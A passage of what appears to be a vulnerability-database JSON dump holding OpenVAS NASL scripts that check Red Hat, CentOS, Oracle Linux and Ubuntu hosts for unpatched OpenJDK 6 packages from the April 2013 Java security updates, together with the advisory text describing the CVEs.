the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n script_tag(name:\"affected\", value:\"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n Multiple flaws were discovered in the font layout engine in the 2D\n component. An untrusted Java application or applet could possibly use these\n flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\n CVE-2013-2383, CVE-2013-2384)\n\n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\n The previous default value of the java.rmi.server.useCodebaseOnly property\n permitted the RMI implementation to automatically load classes from\n remotely specified locations. An attacker able to connect to an application\n using RMI could use this flaw to make the application execute arbitrary\n code. (CVE-2013-1537)\n\n Note: The fix for CVE-2013-1537 changes the default value of the property\n to true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. Refer to Red Hat\n Bugzilla bug 952387 for additional details.\n\n The 2D component did not properly process certain images. An untrusted Java\n application or applet could possibly use this flaw to trigger Java Virtual\n Machine memory corruption. (CVE-2013-2420)\n\n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform MethodHandle\n lookups. An untrusted Java application or applet could use these flaws to\n bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\n It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\n component did not protect against modification of their state while\n performing certain native code operations. An untrusted Java application or\n applet could possibly use these flaws to trigger Java Virtual Machine\n memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\n The JDBC driver manager could incorrectly call the toString() method in\n JDBC drivers, and the ConcurrentHashMap class could incorrectly call the\n defaultReadObject() method. An untrusted Java application or applet could\n possibly use these flaws to bypass Java sandbox restrictions.\n (CVE-2013-1488, CVE-2013-2426)\n\n The sun.awt.datatransfer.ClassLoaderObjectIn ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-24T11:09:26", "bulletinFamily": "scanner", "description": "Check for the Version of java", "modified": "2018-01-24T00:00:00", "published": "2013-04-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881719", "id": "OPENVAS:881719", "title": "CentOS Update for java CESA-2013:0770 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0770 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n Multiple flaws were discovered in the font layout engine in the 2D\n component. An untrusted Java application or applet could possibly use these\n flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\n CVE-2013-2383, CVE-2013-2384)\n\n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\n The previous default value of the java.rmi.server.useCodebaseOnly property\n permitted the RMI implementation to automatically load classes from\n remotely specified locations. An attacker able to connect to an application\n using RMI could use this flaw to make the application execute arbitrary\n code. (CVE-2013-1537)\n\n Note: The fix for CVE-2013-1537 changes the default value of the property\n to true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. Refer to Red Hat\n Bugzilla bug 952387 for additional details.\n\n The 2D component did not properly process certain images. An untrusted Java\n application or applet could possibly use this flaw to trigger Java Virtual\n Machine memory corruption. (CVE-2013-2420)\n\n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform MethodHandle\n lookups. An untrusted Java application or applet could use these flaws to\n bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\n It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\n component did not protect against modification of their state while\n performing certain native code operations. An untrusted Java application or\n applet could possibly use these flaws to trigger Java Virtual Machine\n memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\n The JDBC driver manager could incorrectly call the toString() method in\n JDBC drivers, and the ConcurrentHashMap class could incorrectly call the\n defaultReadObject() method. An untrusted Java application or applet could\n possibly use these flaws to bypass Java sandbox restrictions.\n (CVE-2013-1488, CVE-2013-2426)\n\n The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\n invoke the system class loader. An untrusted Java application or applet\n could possibly use this flaw to bypass certain Java sandbox restrict ...\n\n Description truncated, for more information please check the Reference URL\";\n\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"java on CentOS 6\";\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_id(881719);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-25 10:21:12 +0530 (Thu, 25 Apr 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\",\n \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"CentOS Update for java CESA-2013:0770 centos6 \");\n\n script_xref(name: \"CESA\", value: \"2013:0770\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2013-April/019703.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:51:57", "bulletinFamily": "scanner", "description": "Check for the Version of java", "modified": "2017-07-10T00:00:00", "published": "2013-04-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881724", "id": "OPENVAS:881724", "title": "CentOS Update for java CESA-2013:0770 centos5 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0770 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n Multiple flaws were discovered in the font layout engine in the 2D\n component. An untrusted Java application or applet could possibly use these\n flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\n CVE-2013-2383, CVE-2013-2384)\n\n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\n The previous default value of the java.rmi.server.useCodebaseOnly property\n permitted the RMI implementation to automatically load classes from\n remotely specified locations. An attacker able to connect to an application\n using RMI could use this flaw to make the application execute arbitrary\n code. (CVE-2013-1537)\n\n Note: The fix for CVE-2013-1537 changes the default value of the property\n to true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. Refer to Red Hat\n Bugzilla bug 952387 for additional details.\n\n The 2D component did not properly process certain images. An untrusted Java\n application or applet could possibly use this flaw to trigger Java Virtual\n Machine memory corruption. (CVE-2013-2420)\n\n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform MethodHandle\n lookups. An untrusted Java application or applet could use these flaws to\n bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\n It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\n component did not protect against modification of their state while\n performing certain native code operations. An untrusted Java application or\n applet could possibly use these flaws to trigger Java Virtual Machine\n memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\n The JDBC driver manager could incorrectly call the toString() method in\n JDBC drivers, and the ConcurrentHashMap class could incorrectly call the\n defaultReadObject() method. An untrusted Java application or applet could\n possibly use these flaws to bypass Java sandbox restrictions.\n (CVE-2013-1488, CVE-2013-2426)\n\n The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\n invoke the system class loader. An untrusted Java application or applet\n could possibly use this flaw to bypass certain Java sandbox restrict ...\n\n Description truncated, for more information please check the Reference URL\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(881724);\n script_version(\"$Revision: 6655 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:48:58 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-25 10:24:15 +0530 (Thu, 25 Apr 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\",\n \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for java CESA-2013:0770 centos5 \");\n\n script_xref(name: \"CESA\", value: \"2013:0770\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2013-April/019705.html\");\n script_summary(\"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:52", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2013-0770", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123635", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123635", "title": "Oracle Linux Local Check: ELSA-2013-0770", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0770.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123635\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:33 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0770\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0770 - java-1.6.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0770\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0770.html\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.11.11.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.11.11.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.11.11.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.11.11.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.11.11.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-09T00:00:00", "id": "OPENVAS:1361412562310841421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841421", "title": "Ubuntu Update for openjdk-6 USN-1819-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1819_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openjdk-6 USN-1819-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841421\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-09 10:26:30 +0530 (Thu, 09 May 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\",\n \"CVE-2013-2436\", \"CVE-2013-2415\", \"CVE-2013-2424\", \"CVE-2013-2417\",\n \"CVE-2013-2419\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for openjdk-6 USN-1819-1\");\n\n script_xref(name:\"USN\", value:\"1819-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1819-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openjdk-6'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|11\\.10|10\\.04 LTS)\");\n script_tag(name:\"affected\", value:\"openjdk-6 on Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ben Murphy discovered a vulnerability in the OpenJDK JRE related to\n information disclosure and data integrity. An attacker could exploit this\n to execute arbitrary code. (CVE-2013-0401)\n\n James Forshaw discovered a vulnerability in the OpenJDK JRE related to\n information disclosure, data integrity and availability. An attacker could\n exploit this to execute arbitrary code. (CVE-2013-1488)\n\n Several vulnerabilities were discovered in the OpenJDK JRE related to\n information disclosure, data integrity and availability. An attacker could\n exploit these to cause a denial of service or expose sensitive data over\n the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557, CVE-2013-1558,\n CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2420, CVE-2013-2421,\n CVE-2013-2422, CVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431,\n CVE-2013-2436)\n\n Two vulnerabilities were discovered in the OpenJDK JRE related to\n confidentiality. An attacker could exploit these to expose sensitive data\n over the network. (CVE-2013-2415, CVE-2013-2424)\n\n Two vulnerabilities were discovered in the OpenJDK JRE related to\n availability. An attacker could exploit these to cause a denial of service.\n 